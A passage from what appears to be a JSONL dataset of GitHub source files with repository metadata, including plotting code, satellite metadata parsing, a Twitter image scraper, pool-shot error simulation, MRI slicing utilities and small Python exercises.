ds[z].isel(loc).transpose(y, x).values\n # mask = daz.notnull().values\n\n ax.pcolormesh(\n xdata,\n ydata,\n zdata,\n shading=\"nearest\",\n # edgecolors=\"face\",\n rasterized=True,\n cmap=palette,\n )\n\n if (fig is not None) or format_axs is True:\n _do_axes_formatting(\n axs,\n col,\n row,\n labels,\n domains,\n sizes,\n x,\n y,\n grid,\n grid_which,\n grid_alpha,\n xlim,\n ylim,\n xscale,\n yscale,\n xbase,\n ybase,\n hspans,\n span_color,\n span_alpha,\n span_linestyle,\n span_linewidth,\n vspans,\n )\n\n if True:\n if (palette is None):\n add_visualize_legend(\n ax=axs[-1, -1],\n complexobj=False,\n max_mag=1,\n legend_loc=(1.1, 0.8),\n legend_size=0.2,\n # complexobj=np.iscomplexobj(array),\n # max_mag=max_mag,\n # max_projections=max_projections,\n # legend_loc=legend_loc,\n # legend_size=legend_size,\n # legend_bounds=legend_bounds,\n # legend_resolution=legend_resolution,\n )\n else:\n norm = mpl.colors.Normalize(0, 1)\n cax = axs[0, -1].inset_axes((1.1, 0.1, 0.05, 0.8))\n\n 
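# for a named `palette` the mesh was drawn with a real colormap, so a\n            # colorbar is attached in a thin inset strip to the right of the\n            # top-right panel; note the norm is re-created here as\n            # Normalize(0, 1), so the bar is labelled on a relative 0-1 scale\n            # rather than with the raw zmin/zmax range computed at the top of\n            # this function\n            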
fig.colorbar(\n                mpl.cm.ScalarMappable(norm=norm, cmap=palette),\n                cax=cax,\n                orientation='vertical',\n                label=_make_bold(z)\n            )\n\n    return fig, axs\n","repo_name":"jcmgray/xyzpy","sub_path":"xyzpy/plot/plotter_matplotlib.py","file_name":"plotter_matplotlib.py","file_ext":"py","file_size_in_byte":85274,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"19"}
{"seq_id":"39532057529","text":"def f_fatorial():\r\n    x = 1\r\n    numero = []\r\n    fatorial = []\r\n    while x <= 5:\r\n        numero.append(int(input(\"Digite o número inteiro para calcular fatorial\")))\r\n        x = x + 1\r\n    for y in range(len(numero)):\r\n        fat = numero[y]\r\n        z = 1\r\n        resultado_fat = 1\r\n        while z <= fat:\r\n            resultado_fat = resultado_fat * z\r\n            z = z + 1\r\n        fatorial.append(resultado_fat)\r\n    return fatorial\r\ndef main():\r\n    print(f_fatorial())\r\nmain()\r\n","repo_name":"kevenescovedo/exercicios-python-func-o-2-semestre-ADS-conteudo-da-p1","sub_path":"lista function/Lista Com retorno e sem parametro/exercicio8[.py","file_name":"exercicio8[.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"24139167280","text":"class mtl(object):\n\n    def __init__(self):\n        self.mult = []\n        self.add = []\n\n        self.date = []\n        self.time = []\n\n        self.sun_azimuth = 0\n        self.sun_elevation = 0\n\n        self.earth_sun_distance = 0\n\n        self.lat_cen = 0\n        self.lon_cen = 0\n\n        self.pub_path = 'E:\\\\RSImg\\\\LC08_L1TP_119039_20201213_20210313_01_T1\\\\LC08_L1TP_119039_20201213_20210313_01_T1'\n\n    def read_mtl(self):\n        global ul_lat, ur_lat, ul_lon, ur_lon, ll_lon, lr_lon, lr_lat, ll_lat\n        filename = self.pub_path + '_MTL.txt'\n        f = open(filename, 'r')\n        metadata = f.readlines()\n        f.close()\n        temp_line = 0\n\n        for line in metadata:\n            if line.__contains__('DATE_ACQUIRED'):\n                arr = line.split('=')[1].split('-')\n                for i in arr:\n                    self.date.append(float(i))\n            elif line.__contains__('SCENE_CENTER_TIME'):\n                arr = line.split('=')[1].split('\"')[1].split(':')\n                for i in arr[0:2]:\n                    self.time.append(float(i))\n\n            elif line.__contains__('SUN_AZIMUTH'):\n                self.sun_azimuth = float(line.split('=')[1])\n            elif line.__contains__('SUN_ELEVATION'):\n                self.sun_elevation = float(line.split('=')[1])\n\n            elif line.__contains__('CORNER_UL_LAT_PRODUCT'):\n                ul_lat = float(line.split('=')[1])\n            elif line.__contains__('CORNER_UL_LON_PRODUCT'):\n                ul_lon = float(line.split('=')[1])\n            elif line.__contains__('CORNER_UR_LAT_PRODUCT '):\n                ur_lat = float(line.split('=')[1])\n            elif line.__contains__('CORNER_UR_LON_PRODUCT'):\n                ur_lon = float(line.split('=')[1])\n            elif line.__contains__('CORNER_LL_LAT_PRODUCT'):\n                ll_lat = float(line.split('=')[1])\n            elif line.__contains__('CORNER_LL_LON_PRODUCT'):\n                ll_lon = float(line.split('=')[1])\n            elif line.__contains__('CORNER_LR_LAT_PRODUCT '):\n                lr_lat = float(line.split('=')[1])\n            elif line.__contains__('CORNER_LR_LON_PRODUCT'):\n                lr_lon = float(line.split('=')[1])\n\n            elif line.__contains__('EARTH_SUN_DISTANCE'):\n                self.earth_sun_distance = float(line.split('=')[1])\n            elif line.__contains__('RADIOMETRIC_RESCALING'):\n                break\n            temp_line += 1\n\n        self.lat_cen = (ul_lat + ur_lat + ll_lat + lr_lat) / 4\n        self.lon_cen = (ul_lon + ur_lon + ll_lon + lr_lon) / 4\n\n        rad_mult = metadata[temp_line + 1:temp_line + 12]\n        rad_add = metadata[temp_line + 12:temp_line + 23]\n\n        for line in rad_mult:\n            self.mult.append(float(line.split('=')[1]))\n        for line in 
rad_add:\n self.add.append(float(line.split('=')[1]))\n","repo_name":"wudong1997/RSImgProsecessing","sub_path":"readMTL.py","file_name":"readMTL.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"14289829115","text":"# Archivo reto10.py\n## crear variables desde un diccionario\ndef reto10():\n dict = {'titulo':'El Más Allá',\n 'aka':'E tu vivrai nel terrore - Laldilà',\n 'director':'Lucio Fulci', \n 'año':1981, \n 'país':'Italia'}\n ### crear lista de los valores:\n valores =[]\n for llave, valor in dict.items():\n valores.append(valor)\n print(valores)\n ### creaer variables con los nombres: var0, var1, var2, ...\n for n, val in enumerate(valores):\n globals()[\"var%d\"%n] = val\n print(f\"\"\" \n titulo: {var0}\n aka: {var1}\n director: {var2}\n año: {var3}\n país: {var4}\"\"\") \n ### o con la manera manual:\n titulo = dict['titulo']\n aka = dict['aka']\n director = dict['director']\n anio = dict['año']\n pais = dict['país']","repo_name":"frkroe/EDEM2022","sub_path":"1Fundamentos/Python/Retos/faciles/reto10.py","file_name":"reto10.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40183048287","text":"from dataclasses import dataclass, field\nfrom typing import List, Dict\nimport pandas as pd\nimport numpy as np\nimport logging as log\n\n\n@dataclass(frozen=True, order=True)\nclass Side:\n \"\"\"Side Class, represents agents.\"\"\"\n name: str\n size: int = 1\n \n def __repr__(self) -> str:\n return self.name\n\n\n@dataclass\nclass Event:\n \"\"\"Event consisting of sides, spots and timeslots.\"\"\"\n name: str\n slots: int = 1\n spots: List[str] = field(default_factory=list)\n sides: List[Side] = field(default_factory=list)\n freq_side: pd.DataFrame = field(default_factory=pd.DataFrame)\n freq_spot: pd.DataFrame = field(default_factory=pd.DataFrame)\n shedule: List[Dict[str, List[Side]]] = field(default_factory=list)\n \n\n def __init__(\n self, \n name: str, \n spots: List[str], \n sides: List[Side],\n slots: int\n ) -> None:\n\n self.name = name\n self.slots = slots\n self.spots = sorted(list(spots))\n self.sides = sorted(list(sides))\n \n self.freq_side = pd.DataFrame(\n np.zeros([len(self.sides)] * 2, dtype=\"int\"),\n index=self.sides,\n columns=self.sides\n )\n self.freq_spot = pd.DataFrame(\n np.zeros((len(self.sides), len(self.spots)), dtype=\"int\"),\n index=self.sides,\n columns=self.spots\n )\n\n self.timetable = [\n {spot: [] for spot in self.spots} \n for _ in range(slots)\n ]\n \n def get_timeslot(self, time: int) -> Dict[str, List]:\n return self.timetable[time]\n \n def _update_freq_side(self) -> None:\n log.info(\"Updating side frequency\")\n _freq_side: pd.DataFrame = pd.DataFrame(\n np.zeros([len(self.sides)] * 2, dtype=\"int\"),\n index=self.sides,\n columns=self.sides\n )\n \n all_groups = [group for slot in self.timetable for group in slot.values()]\n \n for side in self.sides:\n for grouping in all_groups:\n for c_side in grouping:\n if c_side in grouping and side in grouping:\n _freq_side.loc[side, c_side] += 1 # type: ignore [Custom index Side]\n \n self.freq_side = _freq_side\n \n \n def _update_freq_spot(self) -> None:\n log.info(\"Updating spot frequency\")\n _freq_spot: pd.DataFrame = pd.DataFrame(\n np.zeros((len(self.sides), len(self.spots)), dtype=\"int\"),\n index=self.sides,\n columns=self.spots\n )\n \n for side in self.sides:\n for timeslot in 
self.timetable:\n for spot, sides in timeslot.items():\n if side in sides:\n _freq_spot.loc[side, spot] += 1 # type: ignore [Custom index Side]\n \n self.freq_spot = _freq_spot\n \n \n def update_freqs(self) -> None:\n \"\"\"Update frequency metrics.\"\"\"\n self._update_freq_side()\n self._update_freq_spot()\n","repo_name":"JoeBlackSci/sidesched","sub_path":"sidesched/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22713128662","text":"from SeleniumDriverCreator import SeleniumDriverCreator\nfrom selenium.webdriver.common.by import By\nimport time\nfrom Constants import Constants\nimport re\nfrom Database import Database\nimport StaticMethods\n\n\n\ndef getImage():\n driverCreator = SeleniumDriverCreator()\n driver = driverCreator.createDriver()\n driver.get(Constants.twitterUrl)\n time.sleep(15)\n checkForAdultButton(driver)\n driver.get_screenshot_as_file(\"twitterShot.png\")\n element = driver.find_elements(By.TAG_NAME, 'img')\n if len(element) > 0:\n reString = r'^https:\\/\\/pbs.twimg.com\\/media\\/.+small$'\n images = []\n for ele in element:\n if re.search(reString,ele.get_attribute('src')):\n images.append(ele.get_attribute('src'))\n if len(images) > 0:\n imageSrc = getTwImgDb(images)\n else:\n imageSrc = 'images/twitErrImg.jpg'\n print(\"twitter image grabber isn't working for some reason. No images in element. All models images may be marked as 18+.\")\n else:\n imageSrc = 'images/twitErrImg.jpg'\n print(\"twitter image grabber isn't working for some reason. No elements.\")\n driver.quit()\n return imageSrc\n\ndef checkForAdultButton(driver):\n button = driver.find_elements(By.XPATH, \"/html/body/div[1]/div/div/div[2]/main/div/div/div/div[1]/div/div[3]/div/div/div[2]/div/div[3]\")\n if len(button) > 0:\n button[0].click()\n time.sleep(10)\n\ndef getTwImgDb(images):\n db = Database()\n twImgList, twImgQue, bannedList = db.getTwImgStuff()\n if not twImgList:\n db.setTwImgList(images)\n db.setTwImgQueue(images)\n twImgList = images\n twImgQue = images\n elif images[0] not in twImgList and images[0] not in bannedList:\n StaticMethods.pinImage(images[0],Constants.PIN_TIME_LONG)\n twImgList.insert(0, images[0])\n db.setTwImgList(twImgList)\n elif not twImgQue:\n twImgQue = twImgList\n url = StaticMethods.checkImagePin()\n if url:\n imageSrc = url\n else:\n imageSrc = twImgQue.pop(0)\n db.setTwImgQueue(twImgQue)\n return imageSrc","repo_name":"Bombg/SassBot","sub_path":"TwitterImageGrabber.py","file_name":"TwitterImageGrabber.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"478707784","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import collections as mc\nimport matplotlib.image as mpimg\nfrom pool import utils\n\nclass VisionErrorAnalysis:\n \n def __init__(self, \n pockets=None,\n ball_radius=None,\n pool_table_size=None\n ):\n params=utils.Params()\n if pockets is None:\n self.pockets=np.array(params.POCKETS_MM) \n else: \n self.pockets=pockets\n if ball_radius is None:\n self.ball_radius=params.BALL_RADIUS_MM\n else:\n self.ball_radius=ball_radius\n if pool_table_size is None:\n self.pool_table_size=params.DISPLAY_SIZE_MM\n else:\n self.pool_table_size=pool_table_size\n\n def generate_combinations_vision_system(self, num_real_points, num_estimated_points, 
maximum_error_vision_system):\n        safety_distance=3*self.ball_radius #so the balls don't touch the pool table walls\n        #real points configs\n        C=utils.generate_random_numbers_inside_rectangle(num_real_points,self.pool_table_size,safety_distance)\n        T=utils.generate_random_numbers_inside_rectangle(num_real_points,self.pool_table_size,safety_distance)\n        index_real = np.arange(num_real_points)\n        CT = np.c_[index_real, C, T]\n        #estimated points configs\n        index_estimated = np.arange(num_estimated_points).reshape(-1,1)\n        CT_extended=utils.get_row_combinations_of_two_arrays(CT, index_estimated)\n        C_extended = CT_extended[:,1:3]\n        T_extended = CT_extended[:,3:5]\n        C_estimated=utils.generate_random_number_inside_circle(C_extended,maximum_error_vision_system)\n        T_estimated=utils.generate_random_number_inside_circle(T_extended,maximum_error_vision_system)\n        CT_real_and_estimated = np.c_[CT_extended, C_estimated, T_estimated]\n        #pockets configs\n        index_pocket = np.arange(1,7)\n        pockets = np.c_[index_pocket,self.pockets]\n        comb = utils.get_row_combinations_of_two_arrays(CT_real_and_estimated, pockets)\n        df=pd.DataFrame({'real_point_id':comb[:,0],\n                        'C_x':comb[:,1],\n                        'C_y':comb[:,2],\n                        'T_x':comb[:,3],\n                        'T_y':comb[:,4],\n                        'estimated_point_id':comb[:,5],\n                        'C_estimated_x':comb[:,6],\n                        'C_estimated_y':comb[:,7],\n                        'T_estimated_x':comb[:,8],\n                        'T_estimated_y':comb[:,9],\n                        'pocket_id':comb[:,10],\n                        'P_x':comb[:,11],\n                        'P_y':comb[:,12]})\n        return df\n\n    def compute_geometric_parameters(self, df):\n        \"\"\"Add the distances (d, b, a) and angles (beta, alpha) of the C-T-P shot geometry to df.\n        \"\"\"\n        C=df[['C_x','C_y']].values\n        T=df[['T_x','T_y']].values\n        P=df[['P_x','P_y']].values\n        r=self.ball_radius\n\n        # we calculate d and b using T and C points\n        d=np.linalg.norm(T-C, axis=1)\n        b=np.linalg.norm(T-P, axis=1)\n\n        #To compute a and alpha we need to use cos and sin rules\n        beta=np.pi-utils.angle_between_3_points(C,T,P)\n        #beta=angle_abc(C_arr,T_arr,X_arr)\n        #phi=angle_abc(T_arr,C_arr,np.array([1,0]))\n        a=np.sqrt(d**2+(2*r)**2-2*d*(2*r)*np.cos(beta))\n        alpha=np.arcsin(2*r*np.sin(beta)/a)\n        #alpha=angle_abc(X_arr,C_arr,T_arr)\n\n        df['b']=b\n        df['a']=a\n        df['d']=d\n        df['beta']=beta\n        df['alpha']=alpha\n\n        return df\n    \n    def compute_X(self, df):\n\n        T=df[['T_x','T_y']].values\n        P=df[['P_x','P_y']].values\n        b=np.linalg.norm(T-P, axis=1)\n        r=self.ball_radius\n\n        # virtual point X\n        # we parametrize the line PT equation and compute the point\n        # that is 2*r distance from T\n        t=1+2*r*(1/b)\n        x_x=P[:,0]+(T[:,0]-P[:,0])*t\n        y_x=P[:,1]+(T[:,1]-P[:,1])*t\n        X=np.column_stack([x_x,y_x]) \n        df['X_x']=X[:,0]\n        df['X_y']=X[:,1]\n        return df\n    \n    def compute_X_estimated(self, df):\n\n        T_estimated=df[['T_estimated_x','T_estimated_y']].values\n        P=df[['P_x','P_y']].values\n        b=np.linalg.norm(T_estimated-P, axis=1)\n        r=self.ball_radius\n\n        # virtual point X\n        # we parametrize the line PT equation and compute the point\n        # that is 2*r distance from T\n        t=1+2*r*(1/b)\n        x_x=P[:,0]+(T_estimated[:,0]-P[:,0])*t\n        y_x=P[:,1]+(T_estimated[:,1]-P[:,1])*t\n        X_estimated=np.column_stack([x_x,y_x]) \n        df['X_estimated_x']=X_estimated[:,0]\n        df['X_estimated_y']=X_estimated[:,1]\n        return df\n\n    def valid_CT_points(self, df):\n        df = df[df['d']>2.5*self.ball_radius]\n        return df\n\n    def cue_ball_trajectory(self, df):\n        \"\"\"Line through the real C parallel to the estimated aiming line C'X'.\n        \"\"\"\n        C=df[['C_x','C_y']].values\n        C_estimated=df[['C_estimated_x','C_estimated_y']].values\n        X_estimated=df[['X_estimated_x','X_estimated_y']].values\n        r=self.ball_radius\n        \n        #line parallel to C'X' that goes through C\n        slope=(X_estimated[:,1]-C_estimated[:,1])/(X_estimated[:,0]-C_estimated[:,0])\n        
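# the estimated aiming direction C'X' is transferred onto the true cue\n        # position: a line with the same slope through the real C models the\n        # shot actually played under vision error; e.g. with C'=(0,0) and\n        # X'=(1,1) the slope is 1, so a cue really at C=(2,0) gives intercept\n        # 0 - 1*2 = -2, i.e. the parallel line y = x - 2\n        # (a vertical aim, X'_x == C'_x, would make this slope form blow up,\n        # but the sampled points are continuous so that case is measure zero)\n        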
intercept=C[:,1]-slope*C[:,0]\n\n return slope,intercept\n\n\n def compute_Q_vision_system(self, df): \n\n C=df[['C_x','C_y']].values\n T=df[['T_x','T_y']].values\n P=df[['P_x','P_y']].values\n r=self.ball_radius\n\n slope, intercept = self.cue_ball_trajectory(df)\n\n X_calculated1,X_calculated2=utils.intersection_circle_line(slope, intercept,r,T)\n\n distCX_calculated1 = np.linalg.norm(C-X_calculated1, axis=1)\n distCX_calculated2 = np.linalg.norm(C-X_calculated2, axis=1)\n\n # we choose the point of intersection that is closest to C\n Cond1 = (distCX_calculated10)\n \n a = np.cross(P[clockwise] - X1[clockwise], T[clockwise] - X1[clockwise]) > 0\n b = np.cross(P[clockwise] - X2[clockwise], T[clockwise] - X2[clockwise]) < 0\n cw_cond=(a & b)\n\n X1_counterclock=X2\n X2_counterclock=X1\n a = np.cross(P[counter_clockwise] - X1_counterclock[counter_clockwise], T[counter_clockwise] - X1_counterclock[counter_clockwise]) < 0\n b = np.cross(P[counter_clockwise] - X2_counterclock[counter_clockwise], T[counter_clockwise] - X2_counterclock[counter_clockwise]) > 0\n ccw_cond=(a & b)\n\n cond=np.full((T.shape[0], ), True)\n cond[clockwise]=cw_cond\n cond[counter_clockwise]=ccw_cond\n\n return df[cond]\n \n def get_error_data_vision_system(self,\n num_real_points,\n num_estimated_points,\n maximum_error_vision_system):\n\n df=self.generate_combinations_vision_system(num_real_points, \n num_estimated_points, \n maximum_error_vision_system)\n df=self.compute_geometric_parameters(df)\n df=self.compute_X(df)\n df=self.compute_X_estimated(df)\n df=self.pockets_inside_region_of_interest(df)\n df=self.valid_CT_points(df)\n df=self.compute_Q_vision_system(df)\n\n return df\n \nclass ActuatorErrorAnalysis(VisionErrorAnalysis):\n def __init__(self,\n pockets=None,\n ball_radius=None,\n pool_table_size=None):\n super().__init__(pockets, ball_radius,pool_table_size)\n\n def generate_combinations_actuator(self, num_real_points, deviation_angle, number_of_angles):\n safety_distance=3*self.ball_radius #so the balls dont touch the pool table walls\n #real points configs\n C=utils.generate_random_numbers_inside_rectangle(num_real_points,self.pool_table_size,safety_distance)\n T=utils.generate_random_numbers_inside_rectangle(num_real_points,self.pool_table_size,safety_distance)\n index_real = np.arange(num_real_points)\n CT = np.c_[index_real, C, T]\n #pockets configs\n index_pocket = np.arange(1,7)\n pockets = np.c_[index_pocket,self.pockets]\n comb = utils.get_row_combinations_of_two_arrays(CT, pockets)\n deviation_angles=np.random.uniform(-deviation_angle,deviation_angle,size=(number_of_angles,1))#.reshape(-1,1)\n comb = utils.get_row_combinations_of_two_arrays(comb, deviation_angles)\n df=pd.DataFrame({'real_point_id':comb[:,0],\n 'C_x':comb[:,1],\n 'C_y':comb[:,2],\n 'T_x':comb[:,3],\n 'T_y':comb[:,4],\n 'pocket_id':comb[:,5],\n 'P_x':comb[:,6],\n 'P_y':comb[:,7],\n 'deviation_angle':comb[:,8],\n })\n return df\n\n def generate_cue_ball_trajectories(self, df):\n\n C=df[['C_x','C_y']].values\n T=df[['T_x','T_y']].values\n P=df[['P_x','P_y']].values\n X=df[['X_x','X_y']].values\n\n slope=(X[:,1]-C[:,1])/(X[:,0]-C[:,0])\n slope_angle=np.degrees(np.arctan(slope))\n deviated_slope_angle=slope_angle+df['deviation_angle']\n deviated_slope=np.tan(np.radians(deviated_slope_angle))\n deviated_intercept=C[:,1]-deviated_slope*C[:,0]\n df['slope']=deviated_slope\n df['intercept']=deviated_intercept\n\n return df\n\n def compute_Q_actuator(self, df): \n\n C=df[['C_x','C_y']].values\n T=df[['T_x','T_y']].values\n 
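# Q below is the contact point of the (deviated) cue-ball path with the\n        # target ball: the trajectory line is intersected with a circle centred\n        # on T, and of the two candidate intersections the one nearer to C is\n        # kept as the first, physical contact\n        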
P=df[['P_x','P_y']].values\n slope=df[['slope']].values.ravel()\n intercept=df[['intercept']].values.ravel()\n r=self.ball_radius\n\n X_calculated1,X_calculated2=utils.intersection_circle_line(slope, intercept,r,T)\n\n distCX_calculated1 = np.linalg.norm(C-X_calculated1, axis=1)\n distCX_calculated2 = np.linalg.norm(C-X_calculated2, axis=1)\n\n # we choose the point of intersection that is closest to C\n Cond1 = (distCX_calculated1=b, b, arr)\n arr = (arr-arr.min()) / (arr.max()-arr.min())\n return arr\n\ndef take_slices(folder, suffix, slice_indices=[106,110,114]):\n '''\n This method is used to take slices from every volumes in a folder to create an array\n folder: the folder all images are stored.\n n1: number of the first slice to take from each single image.\n n2: number of the second slice to take from each single image.\n n3: number of the third slice to take from each single image.\n cut1: the percentage to cut from the left-side end in the histogram of the image\n cut2: the percentage to cut from the right-side end in the histogram of the image\n '''\n \n slices=[]\n file_list = [x for x in os.listdir(folder) if x.endswith(suffix)]\n \n for image in tqdm(sorted(file_list)):\n arr = nb.load(os.path.join(folder, image)).get_fdata()\n slice_list = []\n for s in slice_indices:\n slice_list.append(arr[:, s, :])\n slice_array = np.stack(slice_list)\n\n sample = np.swapaxes(np.swapaxes(slice_array, 0, 1), 1, 2)\n slices.append(np.float32(sample))\n slices = np.array(slices)\n return slices\n\ndef take_all_slices(folder, suffix):\n slices=[]\n file_list = [x for x in os.listdir(folder) if x.endswith(suffix)]\n \n for image in tqdm(sorted(file_list)):\n arr = nb.load(os.path.join(folder, image)).get_fdata()\n arr = np.swapaxes(arr, 1, 2)\n\n slices.append(np.float32(arr))\n slices = np.array(slices)\n return slices\n\ndef resample_and_take_all_slices(\n input_dir,\n input_suffix,\n resample_shape = [96, 104, 96],\n subject_limit = None, # In initial runs, smriprep hasn't been completed on all subjects so to not run on everyone\n subject_exclusions = []\n):\n from nibabel.processing import conform\n\n file_list = [x for x in os.listdir(input_dir) if x.endswith(input_suffix)]\n \n slices=[]\n \n if not subject_limit:\n subject_limit = len(file_list)\n\n for image in tqdm(sorted(file_list)[0:subject_limit]):\n img = nb.load(os.path.join(input_dir, image))\n \n conformed_img = conform(img, out_shape = resample_shape)\n arr = conformed_img.get_fdata()\n arr = np.swapaxes(arr, 1, 2)\n\n slices.append(np.float32(arr))\n \n slices = np.array(slices)\n return slices\n\ndef display_100_subject_images(image_dir, file_list, zscored=False):\n plt.figure(figsize=(15, 60))\n \n for i in range(100):\n img = nb.load(os.path.join(image_dir, file_list[i]))\n img_arr = nb.as_closest_canonical(img).get_fdata()\n\n plt.subplot(20, 5, i+1)\n plt.axis('off')\n if zscored:\n plt.imshow(img_arr[:, 110, :].T, cmap='gray', origin='lower', vmin=-12, vmax=12)\n else:\n plt.imshow(img_arr[:, 110, :].T, cmap='gray', origin='lower')\n plt.title('subject: ' + file_list[i].split('_')[0])\n\n plt.show()\n \ndef display_100_subject_images_npy(npy_path, target_slice = 110, zscored=False):\n from scipy.ndimage import rotate\n \n plt.figure(figsize=(15, 60))\n img_data = np.load(npy_path)\n \n for i in range(100):\n plt.subplot(20, 5, i+1)\n plt.axis('off')\n if zscored:\n plt.imshow(img_data[i , :, target_slice, :], cmap='gray', vmin=-12, vmax=12)\n else:\n plt.imshow(img_data[i , :, target_slice, :], cmap='gray')\n 
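# z-scored volumes are rendered on a fixed symmetric window (+/-12 SD)\n        # so intensities are comparable across subjects, while raw volumes are\n        # left to autoscale per image\n        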
plt.title('subject: ' + file_list[i].split('_')[0])\n\n    plt.show()","repo_name":"chris-lew/predicting_ATN_markers_using_MRI","sub_path":"img_utils.py","file_name":"img_utils.py","file_ext":"py","file_size_in_byte":8355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"34351152815","text":"def substrlen(s):\n    last_idx = {}\n    max_len = 0\n    start_idx = 0\n\n    for i in range(0, len(s)):\n        if s[i] in last_idx:\n            start_idx = max(start_idx, last_idx[s[i]] + 1)\n        max_len = max(max_len, i - start_idx + 1)\n        last_idx[s[i]] = i\n\n    return max_len\n\nprint(substrlen('abcabcbb'))\n","repo_name":"arpi21/tumolabs_dealeronduty","sub_path":"Day 1/Assesment 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"25989981747","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nHOST = \"localhost\"\nPORT = 4223\nUID = \"2hghdk\" # Change XYZ to the UID of your CAN Bricklet\n\nfrom tinkerforge.ip_connection import IPConnection\nfrom tinkerforge.bricklet_can_v2 import BrickletCANV2\n\ndef cb_frame_read(frame_type, identifier, data):\n    print(frame_type, identifier, data)\n\nif __name__ == \"__main__\":\n    ipcon = IPConnection() # Create IP connection\n    can = BrickletCANV2(UID, ipcon) # Create device object\n\n    ipcon.connect(HOST, PORT) # Connect to brickd\n    # Don't use device before ipcon is connected\n\n    can.register_callback(can.CALLBACK_FRAME_READ, cb_frame_read)\n    can.set_frame_read_callback_configuration(True)\n\n    input(\"Press key to exit\\n\")\n    can.set_frame_read_callback_configuration(False)\n    ipcon.disconnect()\n","repo_name":"Tinkerforge/can-v2-bricklet","sub_path":"software/tests/read_callback.py","file_name":"read_callback.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
{"seq_id":"75308816420","text":"import glob\nimport sys\nfrom string import Template \n\ndef format_date(pdte):\n    pdte= pdte.replace(\"\\\"\", \"\")\n    s = pdte.split(\" \")\n    if(len(s) < 2):\n        return None\n    dte = s[0].split(\"/\")\n    tme = s[1]\n    day, month, yyyy = dte\n    frmt_dt = yyyy + \"-\" + month + \"-\" + day + \" \" + tme\n    return frmt_dt\n\n\ndef main(data_dir, database):\n    sql_template = Template(\"\"\"INSERT INTO RAW_DATA (pickup_date_time,lat, lon, base) VALUES('$PICKUP_DT', $LAT, $LON, $BASE);\"\"\")\n    print(\"USE uber;\")\n    data_files_path = glob.glob(data_dir+ \"*.csv\")\n    for path in data_files_path:\n        with open(path, 'r') as f:\n            next(f)\n            for line in f:\n                fields = line.split(\",\")\n                if len(fields) < 4:\n                    continue\n                pickup_dt = format_date(fields[0])\n                if pickup_dt is None:\n                    continue \n                lat = fields[1]\n                lon = fields[2]\n                base = fields[3]\n                insert_sql = sql_template.substitute(PICKUP_DT = pickup_dt,\n                                                     LAT=lat,\n                                                     LON=lon,\n                                                     BASE=base)\n                print(insert_sql)\n\n    \nif __name__ == \"__main__\":\n    data_directory =sys.argv[1]\n    database = sys.argv[2]\n    main(data_directory, database)\n","repo_name":"epocolis/tool_box","sub_path":"scripts/generate_raw_data_insert.py","file_name":"generate_raw_data_insert.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"28217987702","text":"# Uczestnik funduszu powierniczego - niepoprawna wersja\n# Demonstruje konwersje typow\n\nprint(\n\"\"\"\n Uczestnik funduszu powierniczego\n \nSumuje Twoje miesieczne wydatki, 
zeby Twoj fundusz powierniczy sie nie wyczerpal\n(bo wtedy bylbys zmuszony do podjecia prawdziwej pracy).\n\nWprowadz swoje wymagane miesieczne koszty.\nPoniewaz jestes bogaty, zignoruj grosze i swoje kwoty podaj w pelnych zlotych.\n\n\"\"\"\n)\n\ncar = input(\"Serwi Mercedesa: \")\ncar = int(car)\n\nrent = int(input(\"Apartament w Srodmiesciu: \"))\njet = int(input(\"Wynajem prywatnego samolotu: \"))\ngifts = int(input(\"Podarunki: \"))\nfood = int(input(\"Obiady w restauracjach: \"))\nstaff = int(input(\"Personel (sluzba domowa, kucharz, kierowca, asystent): \"))\nguru = int(input(\"Osobisty guru i coach: \"))\ngames = int(input(\"Gry komputerowe: \"))\n\ntotal = car + rent + jet + gifts + food + staff + guru + games\n\nprint(\"\\nOgolem:\", total)\n\ninput(\"\\n\\nAby zakonczyc program, nacisnij klawisz ENTER.\")","repo_name":"PiotrKwiatosz/Learning-programming","sub_path":"Python Programming for the Absolute Beginner/r02/fundusz_powierniczy_dobry.py","file_name":"fundusz_powierniczy_dobry.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17134071356","text":"import re\nfrom datetime import datetime\n\nfrom pymongo.errors import DuplicateKeyError\n\nfrom anastasia import mongoda\nfrom anastasia.telegramcalendar import create_calendar\n\nfrom anastasia.loghelper import log\n\n\nclass Todo:\n # contains the month printed by addtodo and the self.todos content\n def __init__(self):\n log.info(mongoda.getDB())\n self.current_shown_dates = {}\n self.todos = mongoda.getDB().todos\n\n @staticmethod\n def usage():\n return \"/todo list all todo\\n\" \\\n \"/todo [-d id] delete a todo\"\n\n def clean_list(self,chat_id):\n self.todos[chat_id].remove({\"date\": {\"$lt\": datetime.now()}})\n\n def all_to_do_list(self, chat_id):\n self.clean_list(chat_id)\n st = \"\"\n ct = 1\n for todo in self.todos[chat_id].find().sort(\"date\"):\n st += str(todo[\"date\"].strftime(\"%d/%m\")) + \" (\" + str(ct) + \") : \" + todo[\"task\"] + \"\\n\"\n ct += 1\n return st\n\n def delete_todo(self, chat_id, id_todo):\n self.todos[chat_id].remove(self.todos[chat_id].find().sort(\"date\")[int(id_todo) - 1])\n\n def add_todo(self, chat_id, 